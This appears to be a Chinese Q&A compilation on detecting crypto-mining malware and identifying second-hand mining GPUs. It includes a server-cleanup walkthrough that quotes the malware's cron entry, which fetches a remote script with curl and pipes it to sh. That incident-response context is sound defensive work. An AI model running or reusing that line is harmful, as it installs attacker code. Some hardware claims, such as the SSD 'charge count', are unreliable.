如何判斷伺服器是不是在挖礦
❶ 網警怎麼查單位電腦挖礦
每部電腦挨個排查。
挖礦軟體會佔用電腦的大量運算資源和電力資源,而且會引起主管部門的關注。區域網內有電腦被安裝了挖礦軟體是一件讓人很頭疼的事情,對成百上千台電腦一台一台的進行排查簡直就和大海撈針一樣,需要耗費大量的時間和人力。因為區域網出口做了NAT網路地址轉換,上級部門只能檢測到公司的公網IP,所以只能靠公司內部的網管人員來排查具體的終端了。最笨的辦法就是一台電腦一台電腦的檢查,通過檢查程序列表和任務管理器來找挖礦程序。
電腦挖礦通常是指比特幣挖礦機,就是用於賺取比特幣的電腦。這類電腦一般有專業的挖礦晶元,多採用燒顯卡的方式工作,耗電量較大。用戶用個人計算機下載軟體然後運行特定演算法,與遠方伺服器通訊後可得到相應比特幣,是獲取比特幣的方式之一。
❷ 超算伺服器是礦機嗎
目前不算;據多家媒體報道,上周首次曝光的針對高性能計算實驗室的攻擊覆蓋范圍寬廣,受害機構包括加拿大、中國、美國和歐洲部分地區(包括英國、德國和西班牙)的超算中心。安全專家表示,所有事件似乎都涉及攻擊者使用從合法用戶那裡竊取的SSH憑據(SSH是一種加密網路協議,即使在不安全的網路上也可提供安全的遠程登錄),其中包括大學和機構的研究人員。
從目前各方披露的超算挖礦調查信息來看,經濟因素依然是網路犯罪的第一動力。役使全球超級計算機和高性能計算系統的幕後黑手,很可能就是近年來從事加密貨幣「挖礦」的黑客,但是尚不清楚攻擊者是否也有竊取數據或間諜活動的意圖。
超級計算機和高性能集群為研究人員提供了強大的計算能力,但是,任何能夠將加密采礦惡意軟體植入超算環境的攻擊者都可以把超算變成加密貨幣「礦機」。(編者按:這些黑客很清楚超算適合挖掘的特定「幣種」,例如門羅幣和「收益率」)。
5月11日,由德國巴登-符騰堡州的研究人員和10所大學組成的bwHPC聯盟報告說,它遭受了「安全事件」,導致多個超級計算機和集群離線。
同一天,由於「安全事件」,愛丁堡大學將英國國家高性能計算系統ARCHER下線,並指出類似事件也影響了歐洲其他地區的研究機構。
❸ 如何判斷買的電腦是不是挖礦機
拆了,看內部的灰塵。如果有固態硬碟,可以看看固態硬碟的充電次數。
❹ 怎麼知道自己的電腦,是不是在幫別人挖礦
經常查看系統進程和CPU使用率,一般電腦裝了360以後桌面會有個懸浮窗,看看這個有沒有異常就知道了
❺ 求助伺服器被挖礦程序入侵,如何排查
新客戶於最近向我們SINE安全公司咨詢,說他的伺服器經常卡的網站無法打開,遠程連接
伺服器的慢的要命,有時候PING值都達到300-500之間,還經常掉包,聽客戶這么一說,一般
會判斷為受到了CC+DDOS混合流量攻擊,再具體一問,說是機房那面沒有受到流量攻擊,這
就有點奇怪了,不是流量攻擊,還導致伺服器卡,網站無法打開,這是什麼攻擊?為了解決客
戶伺服器卡的問題,我們隨即安排安全工程師對他的Linux伺服器進行了安全檢測與安全部署。
挖礦木馬還設計了挖礦進程如果被客戶強制停止後,會自動啟動繼續挖礦,達到不間斷的挖礦,
仔細檢查發現是通過設置了每個小時執行任務計劃,遠程下載shell挖礦木馬,然後執行,檢查
當前進程是否存在,不存在就啟動挖礦木馬,進行挖礦。
對客戶的linux伺服器進行詳細了安全檢測發現幸虧沒有加密伺服器的數據,以及感染蠕蟲的病
毒,如果數據被加密那損失大了,客戶是做平台的,裡面的客戶數據很重要,找出挖礦木馬後,
客戶需要知道伺服器到底是如何被攻擊的? 被上傳挖礦木馬的? 防止後期再出現這樣的攻擊
狀況。
通過我們安全工程師的安全檢測與分析,發現該伺服器使用的是apache tomcat環境,平台的開
發架構是JSP+oracle資料庫,apache tomcat使用的是2016年的版本,導致該apache存在嚴重
的遠程執行命令漏洞,入侵者可以通過該漏洞直接入侵伺服器,拿到伺服器的管理員許可權,
SINE安全工程師立即對apache 漏洞進行修復,並清除木馬,至此問題得以解決,客戶伺服器
一切穩定運行,網站打開正常。
❻ 怎麼檢查自己電腦有沒有被人用來挖礦,比特幣
挖礦都是燒的顯卡,以下方法可以鑒定自己顯卡是不是礦卡
1:通過肉眼來識別這個硬體究竟是不是礦卡 ,其實通過其他方式也可以測出,就比如說你到電腦裡面去測礦卡的超頻性能,去跟官方的數據進行對比,測礦卡供電的穩定性,也可以測出來是不是礦卡。
2:第一點是先看礦卡上面有沒有什麼特別臟特別多的灰塵,各種油漬,如果沒有的話那證明賣家可能做了比較好的處理,或者不是礦卡。如果礦卡非常的臟的話,十有八九就是礦卡,那我們就要進行下一步的操作,就是拆開礦卡。
3:我們應該注意到是否有發票且帶保修,保修基本是在全國各地的保修點都可以保修的,這種才不是礦卡。
(6)如何判斷伺服器是不是在挖礦擴展閱讀
如何避免買到礦卡:盡量到淘寶京東的官方旗艦店買新卡,圖便宜買二手顯卡的話就不敢保證了。
如果實在預算有限,一定要購買二手顯卡的話,也要盡量選擇個人購買,切勿相信什麼網吧倒閉,工作室或者公司倒閉,這種渠道大部分買過來的大部分都是礦卡,當然如果那個個人買家手裡也有大量的顯卡賣的話,那也要請謹慎對待,這種大概率也是礦卡。最後,也希望大家可以避免礦卡,買到自己心儀的顯卡,開心游戲。
❼ 礦卡如何辨別
判斷是不是礦卡只有兩個辦法:
礦卡最明顯的標志是GPU核心背面的PCB電路板發黃,這是長時間滿負荷工作導致的。
獲取個溫度曲線和運行時長就知道是不是挖礦了。這么高溫度長時間運行又不採取高效降溫的也只有礦場了。
顯卡礦卡是什麼意思?
所謂的礦卡就是挖礦的顯卡,這里的「挖礦」是虛擬挖礦,一般有專業顯卡來挖礦,挖到的礦其實就是比特幣,用戶用電腦下載挖礦軟體然後運行特定演算法,與遠方伺服器通訊後可得到相應比特幣,多採用燒顯卡的方式工作,所以耗電量較大。顯卡礦卡通常都是ATI晶元的顯卡,比特幣倒閉了,那些礦工紛紛把自己平時挖礦的礦卡就拿出來當二手賣了。
礦卡與顯卡的區別:
1、A卡7850以上盡量不要聽信自用,成色看著好的,可以買
n卡 750ti流行這個顯卡挖礦時候已經是好時機了,一般這種卡大量的都是在3月-5月左右買的卡,這種卡挖礦的演算法,溫度不高,功耗也不高
購買礦卡時候,不要去問商家礦了多久
礦卡與非礦卡,區分成色,不是說看看菊花就能看出來的,不光要看菊花,一定要看供電和pcb板子,嚴重的一眼就能看出來,再怎麼水洗,也不可能把pcb礦成黃色變成正常顏色
還有就是經過我的觀察,有些卡批次不一樣電阻和電容是不一樣的,有的本來電阻和電容就是黃色
不買礦卡的盡量別收二手了,新的也盡量不要買呢,返修貨真的不少
❽ 阿里雲伺服器被挖礦了怎麼辦(純純電腦小白
1. 關閉訪問挖礦伺服器的訪問
iptables -A INPUT -s xmr.crypto-pool.fr -j DROP and iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP.
2. chmod -x minerd ,取消掉執行許可權, 在沒有找到根源前,千萬不要刪除 minerd,因為刪除了,過一回會自動有生成一個。
3. pkill minerd ,殺掉進程
4. service stop crond 或者 crontab -r 刪除所有的執行計劃
5. 執行top,查看了一會,沒有再發現minerd 進程了。
6.檢查/var/spool/cron/目錄下發現有個root用戶的定時器文件。
下載腳本的語句:
*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0105010 | sh
病毒文件內容如下,感興趣的可以研究下:
View Code
解決minerd並不是最終的目的,主要是要查找問題根源,我的伺服器問題出在了redis服務了,黑客利用了redis的一個漏洞獲得了伺服器的訪問許可權,http://blog.jobbole.com/94518/然後就注入了病毒,下面是解決辦法和清除工作:
1. 修復 redis 的後門,
配置bind選項, 限定可以連接Redis伺服器的IP, 並修改redis的默認埠6379.
配置AUTH, 設置密碼, 密碼會以明文方式保存在redis配置文件中.
配置rename-command CONFIG 「RENAME_CONFIG」, 這樣即使存在未授權訪問, 也能夠給攻擊者使用config指令加大難度
好消息是Redis作者表示將會開發」real user」,區分普通用戶和admin許可權,普通用戶將會被禁止運行某些命令,如conf
2. 打開 ~/.ssh/authorized_keys, 刪除你不認識的賬號
3. 查看你的用戶列表,是不是有你不認識的用戶添加進來。 如果有就刪除掉.
❾ 如何查看電腦是否被植入了挖礦程序
如何判斷自己的電腦是否被挖礦,怎樣預防?
電腦開機後,所有程序都不打開的情況下。按Ctrl+ALT+Del調出任務管理器,在「進程」卡項中,查看CPU的使用情況。如果看到某個進程佔用了大量的cpu使用情況,並且幾分鍾後都沒有降低的趨勢,這個程序就可能是病毒了。
想要預防自己的電腦被挖礦也很簡單,只要安裝正規的安全軟體,使用安全的瀏覽器,添加安全合適的插件,就可以防止電腦被挖礦了。
當然,如果不瀏覽不正規不健康的網站,不下載盜版游戲,盜版軟體等就更能從根源杜絕電腦被不法分子挖礦的風險。